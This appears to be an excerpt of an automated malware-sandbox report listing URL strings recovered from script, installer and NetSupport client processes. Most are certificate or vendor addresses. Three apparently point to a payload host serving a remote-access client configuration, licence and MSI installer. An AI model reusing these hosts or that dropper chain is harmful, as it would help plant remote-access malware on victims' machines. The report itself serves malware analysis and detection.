                                Source: wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B462000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226577773.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114283016484.00000000038A6000.00000002.00000001.00040000.00000023.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B462000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226577773.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114283016484.00000000038A6000.00000002.00000001.00040000.00000023.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                                Source: winst64.exe, 0000001E.00000003.114226626711.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226774436.00000000010E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crl0f
                                Source: winst64.exe, 0000001E.00000003.114226626711.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226774436.00000000010E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crt0
                                Source: winst64.exe, 0000001E.00000003.114226626711.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226774436.00000000010E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sf.symcd.com0&
                                Source: wscript.exe, 00000006.00000003.114061495045.0000000005C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                Source: wscript.exe, 00000006.00000003.114061495045.0000000005C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: wscript.exe, 00000006.00000003.114061495045.0000000005C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                                Source: wscript.exe, 00000006.00000003.114061495045.0000000005C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226626711.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226774436.00000000010E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                Source: wscript.exe, 00000006.00000003.114061495045.0000000005C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226626711.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226774436.00000000010E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                Source: wscript.exe, 00000006.00000003.114061495045.0000000005C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226626711.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226774436.00000000010E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                Source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: http://www.acer-group.com/public/index/privacy.htm%scountry.dat
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113950407001.0000000005014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113950407001.0000000005014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
                                Source: wscript.exe, 00000006.00000003.114061495045.0000000005C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.flexerasoftware.com0
                                Source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: http://www.google.com
                                Source: pcicfgui_client.exe, 00000022.00000002.114293124962.000000006C079000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: http://www.idk.co.jp
                                Source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: http://www.intel.com/support/eduhttp://www.hp.com/go/hpclassroommanagerpEventDatam_pExhibitingm_pExh
                                Source: cscript.exe, 00000026.00000002.114307415040.0000000002C73000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000026.00000003.114303592438.0000000002C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                                Source: winst64.exe, 0000001E.00000002.114227512458.0000000002D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: winst64.exe, 0000001E.00000002.114227786314.00007FF679395000.00000004.00000001.01000000.00000010.sdmp, client32.exe, 00000020.00000002.115188136908.000000006CD4D000.00000004.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188311380.000000006CD4D000.00000004.00000001.01000000.00000016.sdmp, pcicfgui_client.exe, 00000022.00000002.114292209374.000000006B4AE000.00000004.00000001.01000000.00000022.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp111
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.114078859397.0000000002945000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netsupportsoftware.com
                                Source: msiexec.exe, 00000013.00000003.114081150460.000000000297D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.114080266581.000000000296F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.114080181911.0000000002968000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.114080859440.0000000002970000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.114078918470.000000000294C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.114081033705.0000000002978000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.114079820477.0000000002949000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.114080026944.000000000294C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.114078859397.0000000002945000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netsupportsoftware.com/support
                                Source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: http://www.netsupportsoftware.com/support/clients.asp?version=1400KEYSHOWCLOSEKEYSHOWSTOPKEYSHOWRESU
                                Source: msiexec.exe, 00000013.00000003.114081471578.0000000002938000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netsupportsoftware.com4
                                Source: winst64.exe, 0000001E.00000002.114227512458.0000000002D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pci.co.uk/support
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B45E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, MSIF373.tmp, 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp, MSIF373.tmp, 00000019.00000000.114135574095.0000000000637000.00000008.00000001.01000000.0000000C.sdmp, MSIF985.tmp, 0000001B.00000000.114151205351.0000000000977000.00000008.00000001.01000000.0000000D.sdmp, MSIF985.tmp, 0000001B.00000002.114157116679.0000000000977000.00000004.00000001.01000000.0000000D.sdmp, checkdvd.exe, 0000001C.00000002.114215767889.00000000007CA000.00000004.00000001.01000000.0000000E.sdmp, checkdvd.exe, 0000001C.00000000.114214666288.00000000007CA000.00000008.00000001.01000000.0000000E.sdmp, MSI1387.tmp, 0000001D.00000002.114241948191.0000000001047000.00000004.00000001.01000000.0000000F.sdmp, MSI1387.tmp, 0000001D.00000000.114217707443.0000000001047000.00000008.00000001.01000000.0000000F.sdmp, winst64.exe, 0000001E.00000000.114225758017.00007FF679395000.00000008.00000001.01000000.00000010.sdmp, winst64.exe, 0000001E.00000002.114227786314.00007FF679395000.00000004.00000001.01000000.00000010.sdmp, MSI23E6.tmp, 0000001F.00000002.114270878224.0000000000BF7000.00000004.00000001.01000000.00000014.sdmp, MSI23E6.tmp, 0000001F.00000000.114259508895.0000000000BF7000.00000008.00000001.01000000.00000014.sdmp, client32.exe, 00000020.00000002.115188136908.000000006CD4D000.00000004.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188311380.000000006CD4D000.00000004.00000001.01000000.00000016.sdmp, pcicfgui_client.exe, 00000022.00000002.114292209374.000000006B4AE000.00000004.00000001.01000000.00000022.sdmp, pcicfgui_client.exe, 00000022.00000002.114291271774.000000006B487000.00000004.00000001.01000000.00000022.sdmpString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113948697299.00000000031ED000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.115184199438.00000000033DF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115021312689.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114973594833.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115069509491.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114997019143.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115033721477.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114974072870.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114951277329.00000000033DF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115102531113.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115046659044.00000000033F2000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115069858643.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115149779823.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115046659044.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115172921966.00000000033DF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115046037274.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115033607252.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115008881521.00000000033E8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115115628288.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000026.00000002.114307415040.0000000002C73000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000026.00000003.114303592438.0000000002C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                                Source: wscript.exe, 00000006.00000003.114061495045.0000000005C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                                Source: wscript.exe, 00000006.00000003.114061495045.0000000005C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                                Source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: https://activate.netsupportsoftware.com/update
                                Source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: https://activate.netsupportsoftware.com/update/?s=%s?s=1234%s5678noactlc
                                Source: wscript.exe, 00000000.00000003.113911180803.00000220FBF4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.113918390366.00000220FBF4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.113918129339.00000220FBF4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.113917709896.00000220FBF4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmws
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113950407001.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                                Source: wscript.exe, 00000006.00000003.114061495045.0000000005C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226626711.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226774436.00000000010E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                                Source: wscript.exe, 00000006.00000003.114061495045.0000000005C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226626711.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226774436.00000000010E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113950407001.0000000005014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113950407001.0000000005014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester4
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                                Source: client32.exe, 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: https://help.netsupportschool.com/%s-%s/Default.htmhttps://help.netsupportschool.com/%s-%s/Default.h
                                Source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: https://netsupportschool.com/whats_newAn
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113948697299.00000000031ED000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.115184199438.00000000033DF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115021312689.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114973594833.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115069509491.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114997019143.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115033721477.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114974072870.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114951277329.00000000033DF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115102531113.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115046659044.00000000033F2000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115069858643.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115149779823.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115046659044.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115172921966.00000000033DF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115046037274.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115033607252.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115008881521.00000000033E8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115115628288.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000026.00000002.114307415040.0000000002C73000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000026.00000003.114303592438.0000000002C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                                Source: wscript.exeString found in binary or memory: https://okolinabeauty.com/choh/Client32.ini
                                Source: wscript.exeString found in binary or memory: https://okolinabeauty.com/choh/NSM.lic
                                Source: wscript.exeString found in binary or memory: https://okolinabeauty.com/choh/vrep.msi
                                Source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: https://provisionserver.domain/amtscsTechLogHotKeyPauseHotKeyEndScrapeShowApp225.16.8.69KeepAspectSe
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
